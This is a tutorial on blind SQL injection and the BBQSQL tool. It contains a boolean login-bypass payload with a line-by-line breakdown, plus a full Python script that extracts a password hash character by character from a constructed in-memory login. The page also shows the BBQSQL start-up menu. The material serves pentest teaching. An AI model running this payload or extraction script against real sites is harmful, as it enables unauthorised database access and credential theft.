Penetration Testing for Blind SQL Injection using BBQSQL

SQL (Structured Query Language) is the language used to interact with a database. SQL injection is a web application attack that injects attacker-controlled syntax into the application's SQL queries.

BLIND SQL INJECTION

Blind SQL injection consists of techniques for exploiting a SQL injection vulnerability when the application returns no query output, only a true/false difference in its response (a login succeeds or fails, a page differs, a delay occurs). Data is extracted one character at a time, usually by a binary search over the character's ASCII value, so it is slow: about seven requests per character for the 7-bit ASCII range, each one a full round trip.
An example of blind SQL injection is:
Blind SQL Injection Case:
UNAME = "' or (ASCII(SUBSTR((SELECT user()),1,1))>63) -- ";
PASS = "";
QUERY = "select * from users where pass=md5('"+PASS+"') and uname='"+UNAME+"'";

QUERY evaluates to:
select *
from users where pass=md5('')
and uname='' or (ASCII(SUBSTR((SELECT user()),1,1))>63) -- '

Broken down piece by piece:
select *
from users where pass=md5('') and
uname=''
or (
  ASCII(                   << char -> int
    SUBSTR(                << slice string
      (SELECT user())      << current user (a subquery needs its own parentheses)
    ,1,1)                  << first char
  )>63                     << 63 = '?'
) -- '                     << comment swallows the trailing quote

The left-hand side of the OR is always false (no row has an empty password hash and an empty username), so the login succeeds exactly when the injected comparison is true. The attacker observes whether the login succeeded, halves the candidate range, and repeats with a new threshold until the first character is known, then moves to position 2. In MySQL the `--` comment marker must be followed by a space or it is not treated as a comment, hence the trailing space in UNAME.
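The binary search described above, carried out end to end as an added example (not code from the page or from BBQSQL). It builds a constructed in-memory SQLite stand-in for the vulnerable login, with the same concatenated QUERY shape as above and a registered md5() function, then uses the login's true/false outcome as the oracle to recover the admin's password hash one character at a time. The table contents, the hypothetical VulnerableApp class and the target expression are all assumptions; SQLite's unicode() plays the role of MySQL's ASCII().

```python
import hashlib
import sqlite3

SECRET_PASSWORD = "s3cret"   # constructed sample data, not from the page


class VulnerableApp:
    """Constructed stand-in for the vulnerable login, backed by in-memory SQLite."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        # SQLite has no md5(); register one so the page's query shape works unchanged.
        self.conn.create_function(
            "md5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
        self.conn.execute("CREATE TABLE users (uname TEXT, pass TEXT)")
        self.conn.execute("INSERT INTO users VALUES ('admin', ?)",
                          (hashlib.md5(SECRET_PASSWORD.encode()).hexdigest(),))
        self.requests = 0   # counts "HTTP requests", i.e. oracle queries

    def login(self, uname, password):
        # Deliberately vulnerable: the same string concatenation as QUERY above.
        self.requests += 1
        query = ("select * from users where pass=md5('" + password
                 + "') and uname='" + uname + "'")
        return self.conn.execute(query).fetchone() is not None


def oracle(app, condition):
    """Boolean oracle: True if the injected condition made the login succeed."""
    payload = "' or (" + condition + ") -- "
    return app.login(payload, "")


def extract_char(app, expr, pos):
    """Binary-search the code point of character `pos` (1-based) of SQL expression `expr`."""
    lo, hi = 0, 127           # invariant: the true code point lies in [lo, hi]
    while lo < hi:
        mid = (lo + hi) // 2
        # unicode() is SQLite's equivalent of MySQL's ASCII()
        if oracle(app, f"unicode(substr({expr},{pos},1))>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_string(app, expr, max_len=256):
    """Extract `expr` one character at a time, stopping when the string runs out."""
    out = []
    for pos in range(1, max_len + 1):
        if not oracle(app, f"length({expr})>={pos}"):
            break
        out.append(extract_char(app, expr, pos))
    return "".join(out)


def demo():
    """Run the attack against the constructed app; returns (extracted, actual, requests)."""
    app = VulnerableApp()
    target = "(SELECT pass FROM users WHERE uname='admin')"
    extracted = extract_string(app, target)
    actual = app.conn.execute(
        "SELECT pass FROM users WHERE uname='admin'").fetchone()[0]
    return extracted, actual, app.requests


if __name__ == "__main__":
    extracted, actual, n = demo()
    print(f"extracted {extracted!r} in {n} requests, match={extracted == actual}")
```

Recovering the 32-character hash costs 7 requests per character plus one length probe per position, 257 oracle queries in total; against a real target each of those is an HTTP round trip, which is why the section above calls the technique time consuming and why tools like BBQSQL parallelise the requests.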

There are many tools that can be used to exploit blind SQL injection:
  • SQLMAP
  • SQLNINJA
  • BSQL Hacker
  • Mole
  • Havij …… etc …..
During a penetration test these tools sometimes fail against an unusual injection point, and we end up writing a custom script. BBQSQL can simplify such tricky blind SQL injection attacks.

Blind SQL Injection with BBQSQL

BBQSQL can be used to exploit blind SQL injection and helps reach vulnerabilities that the general-purpose tools miss.
BBQSQL is fast, simple, versatile and extensible.
BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings.
The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.
Like other SQL injection tools, you provide the request information that describes the injection point. You must provide the usual details:
  • URL
  • HTTP Method
  • Headers
  • Cookies
  • Encoding methods
  • Redirect behavior
  • Files
  • HTTP Auth
  • Proxies
Here is the tool's start-up menu, from which the HTTP parameters and BBQSQL options are configured:

root@kali:~# bbqsql
    _______   _______    ______    ______    ______   __      
   |       \ |       \  /      \  /      \  /      \ |  \      
   | $$$$$$$\| $$$$$$$\|  $$$$$$\|  $$$$$$\|  $$$$$$\| $$      
   | $$__/ $$| $$__/ $$| $$  | $$| $$___\$$| $$  | $$| $$      
   | $$    $$| $$    $$| $$  | $$ \$$    \ | $$  | $$| $$      
   | $$$$$$$\| $$$$$$$\| $$ _| $$ _\$$$$$$\| $$ _| $$| $$      
   | $$__/ $$| $$__/ $$| $$/ \ $$|  \__| $$| $$/ \ $$| $$_____
   | $$    $$| $$    $$ \$$ $$ $$ \$$    $$ \$$ $$ $$| $$     \
    \$$$$$$$  \$$$$$$$   \$$$$$$\  \$$$$$$   \$$$$$$\ \$$$$$$$$
                     \$$$                \$$$

                   _.(-)._
                .'         '.
               / 'or '1'='1  \
               |'-...___...-'|
                \    '='    /
                 `'._____.'`
                  /   |   \
                 /.--'|'--.\
              []/'-.__|__.-'\[]
                      |
                     []

    BBQSQL injection toolkit (bbqsql)        
    Lead Development: Ben Toews(mastahyeti)        
    Development: Scott Behrens(arbit)        
    Menu modified from code for Social Engineering Toolkit (SET) by: David Kennedy (ReL1K)    
    SET is located at: http://www.secmaniac.com(SET)    
    Version: 1.0              
   
    The 5 S's of BBQ:
    Sauce, Spice, Smoke, Sizzle, and SQLi
   


 Select from the menu:

   1) Setup HTTP Parameters
   2) Setup BBQSQL Options
   3) Export Config
   4) Import Config
   5) Run Exploit
   6) Help, Credits, and About

  99) Exit the bbqsql injection toolkit

bbqsql>

Happy hunting! Blind SQL injection is now simple and fast.
# This tool is really fast. Try it; it ships with Kali Linux.
# For educational purposes only. Penetration testing without permission is a criminal offence. The author holds no responsibility if you misuse this tutorial.